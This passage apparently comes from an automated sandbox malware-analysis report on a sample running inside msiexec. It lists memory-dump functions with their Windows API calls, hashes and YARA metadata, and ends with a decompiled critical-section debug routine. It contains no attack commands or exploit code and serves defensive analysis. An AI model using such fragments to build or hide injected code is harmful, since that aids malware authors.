                      • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                      • Instruction ID: e513b54fb02712236d9144f6d98de197be71b00804d4402b60c8fa9a8dc072fa
                      • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                      • Instruction Fuzzy Hash: CE01B2B2214108BFCB54DF89DC80EEB77ADAF8C754F158258FA0D97245C630E851CBA4
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 006D91A0, Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
                      Download Yara Rule
                      APIs
                      • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,006CF040,?,?,00000000), ref: 006D91DC
                      Memory Dump Source
                      • Source File: 00000007.00000002.556861627.00000000006C0000.00000040.00020000.sdmp, Offset: 006C0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_6c0000_msiexec.jbxd
                      Yara matches
                      Similarity
                      • API ID: CreateThread
                      • String ID:
                      • API String ID: 2422867632-0
                      • Opcode ID: ddd11cde9aaf76e4a64e768996f8cd04ed7714866a9f477089f933a3bced0f9e
                      • Instruction ID: 0eda90746d9788e532ef4f4c9a37d8cb5b7d49afbab7d07e12f2171c9a94f88c
                      • Opcode Fuzzy Hash: ddd11cde9aaf76e4a64e768996f8cd04ed7714866a9f477089f933a3bced0f9e
                      • Instruction Fuzzy Hash: E1E06D377902043AE2306599AC02FA7B39D9B81B60F54002AFA0DEB2C1D996F90142A8
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 006D919A, Relevance: 1.5, APIs: 1, Instructions: 30threadCOMMON
                      Download Yara Rule
                      APIs
                      • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,006CF040,?,?,00000000), ref: 006D91DC
                      Memory Dump Source
                      • Source File: 00000007.00000002.556861627.00000000006C0000.00000040.00020000.sdmp, Offset: 006C0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_6c0000_msiexec.jbxd
                      Yara matches
                      Similarity
                      • API ID: CreateThread
                      • String ID:
                      • API String ID: 2422867632-0
                      • Opcode ID: c474230f95c30302f2f54f680ebd0a021c67948fa46ea549e868808857975649
                      • Instruction ID: 5ef352b821885938f50f7fb0d55dbafd1758145e9bd46a0789b53c0c898b56d4
                      • Opcode Fuzzy Hash: c474230f95c30302f2f54f680ebd0a021c67948fa46ea549e868808857975649
                      • Instruction Fuzzy Hash: E6E0223278434036E3306669AC03F96AB198F80710F25006EF708AF2C2D4D9E905826A
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 006DA7C0, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                      Download Yara Rule
                      APIs
                      • LookupPrivilegeValueW.ADVAPI32(00000000,?,006CF1C2,006CF1C2,?,00000000,?,?), ref: 006DA7F0
                      Memory Dump Source
                      • Source File: 00000007.00000002.556861627.00000000006C0000.00000040.00020000.sdmp, Offset: 006C0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_6c0000_msiexec.jbxd
                      Yara matches
                      Similarity
                      • API ID: LookupPrivilegeValue
                      • String ID:
                      • API String ID: 3899507212-0
                      • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                      • Instruction ID: acef089bbf959b897547abd43016d6bf3cc5e2eaa687f0635f20c7fa773fda8f
                      • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                      • Instruction Fuzzy Hash: 6FE01AB16002086BDB10DF89CC85EE737ADEF88650F018155BA0C57241C930E8108BF5
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 006CACD3, Relevance: 1.5, APIs: 1, Instructions: 22libraryloaderCOMMON
                      Download Yara Rule
                      APIs
                      • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 006CAD52
                      Memory Dump Source
                      • Source File: 00000007.00000002.556861627.00000000006C0000.00000040.00020000.sdmp, Offset: 006C0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_6c0000_msiexec.jbxd
                      Yara matches
                      Similarity
                      • API ID: Load
                      • String ID:
                      • API String ID: 2234796835-0
                      • Opcode ID: 2d0ef61cf7363694f2a5f9cc5c6e3f1be36ab1b03b27b5dd1b575d3d25a48400
                      • Instruction ID: b65e9d12b952ee1c8e13bb669b14b7bbc9c63766acb520899cf62b25fd75bd02
                      • Opcode Fuzzy Hash: 2d0ef61cf7363694f2a5f9cc5c6e3f1be36ab1b03b27b5dd1b575d3d25a48400
                      • Instruction Fuzzy Hash: F2E046B5E0010EAAEB00DAE4D841FEDB3B9EB44309F008299A9189B640E630EA048B52
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 006CF6B7, Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                      Download Yara Rule
                      APIs
                      • SetErrorMode.KERNELBASE(00008003,?,006C8D14,?), ref: 006CF6EB
                      Memory Dump Source
                      • Source File: 00000007.00000002.556861627.00000000006C0000.00000040.00020000.sdmp, Offset: 006C0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_6c0000_msiexec.jbxd
                      Yara matches
                      Similarity
                      • API ID: ErrorMode
                      • String ID:
                      • API String ID: 2340568224-0
                      • Opcode ID: e79fd08d11b19e2819c1d884b9a689d12867ad8e87ca8e86b3f6458d2da035b0
                      • Instruction ID: b92ac89025077ee5c5f1ec7f3578330e0f94cb01bb82f7558e927a9f9ad2b406
                      • Opcode Fuzzy Hash: e79fd08d11b19e2819c1d884b9a689d12867ad8e87ca8e86b3f6458d2da035b0
                      • Instruction Fuzzy Hash: 9BD05E767902003BE610EBA4DD07F662286AB95754F1E08ACF94CEB3C3D925D5058625
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 006CF6C0, Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                      Download Yara Rule
                      APIs
                      • SetErrorMode.KERNELBASE(00008003,?,006C8D14,?), ref: 006CF6EB
                      Memory Dump Source
                      • Source File: 00000007.00000002.556861627.00000000006C0000.00000040.00020000.sdmp, Offset: 006C0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_6c0000_msiexec.jbxd
                      Yara matches
                      Similarity
                      • API ID: ErrorMode
                      • String ID:
                      • API String ID: 2340568224-0
                      • Opcode ID: 2932bcf02bc07d7163de81b169680dc5c005ffd35bbbe1c0c8f45c66faab01c4
                      • Instruction ID: 1bc21243e76099f91ea9543508b04a52706ec79481342dae4a09eabc63c28dfc
                      • Opcode Fuzzy Hash: 2932bcf02bc07d7163de81b169680dc5c005ffd35bbbe1c0c8f45c66faab01c4
                      • Instruction Fuzzy Hash: 9BD05E626503043BE610BAA5DC03F66338AAB44B40F490078F948973C3D964E4004165
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 046E967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000007.00000002.562611430.0000000004680000.00000040.00000001.sdmp, Offset: 04680000, based on PE: true
                      • Associated: 00000007.00000002.562806022.000000000479B000.00000040.00000001.sdmp Download File
                      • Associated: 00000007.00000002.562834721.000000000479F000.00000040.00000001.sdmp Download File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_4680000_msiexec.jbxd
                      Similarity
                      • API ID: InitializeThunk
                      • String ID:
                      • API String ID: 2994545307-0
                      • Opcode ID: 7b09b3777b7dff3d28408823472d6a7d6041c9721cfed3eac12d26111cd4fd73
                      • Instruction ID: 8dd11cc2385cbce3c111b847b549f9c7272b001ea47e864c8c9d3c6312bb3025
                      • Opcode Fuzzy Hash: 7b09b3777b7dff3d28408823472d6a7d6041c9721cfed3eac12d26111cd4fd73
                      • Instruction Fuzzy Hash: CAB09BF19024C5C5F715DB614A087277A447BD1745F17C052D2430651A5778E0D5F5B5
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Non-executed Functions

                      Function 0473FDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                      Download Yara Rule
                      C-Code - Quality: 53%
                      			E0473FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E046ECE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E04735720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E04735720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                      0x0473fdda
                      0x0473fde2
                      0x0473fde5
                      0x0473fdec
                      0x0473fdfa
                      0x0473fdff
                      0x0473fe0a
                      0x0473fe0f
                      0x0473fe17
                      0x0473fe1e
                      0x0473fe19
                      0x0473fe19
                      0x0473fe19
                      0x0473fe20
                      0x0473fe21
                      0x0473fe22
                      0x0473fe25
                      0x0473fe40

                      APIs
                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0473FDFA
                      Strings
                      • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 0473FE2B
                      • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 0473FE01
                      Memory Dump Source
                      • Source File: 00000007.00000002.562611430.0000000004680000.00000040.00000001.sdmp, Offset: 04680000, based on PE: true
                      • Associated: 00000007.00000002.562806022.000000000479B000.00000040.00000001.sdmp Download File
                      • Associated: 00000007.00000002.562834721.000000000479F000.00000040.00000001.sdmp Download File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_4680000_msiexec.jbxd
                      Similarity
                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                      • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                      • API String ID: 885266447-3903918235
                      • Opcode ID: 3e376267fc3091c43191e952a899e52fd80a747d55c98c2d7645866a022b830f
                      • Instruction ID: c19d591f11417b2ba249e54812b5949de1e31a46b4cc8d99f687831502545f2c
                      • Opcode Fuzzy Hash: 3e376267fc3091c43191e952a899e52fd80a747d55c98c2d7645866a022b830f
                      • Instruction Fuzzy Hash: 3EF0F672640601BFEA201A55DC06F33BB9EEB44771F140354F628562E2EAA2FC2096F4
                      Uniqueness

                      Uniqueness Score: -1.00%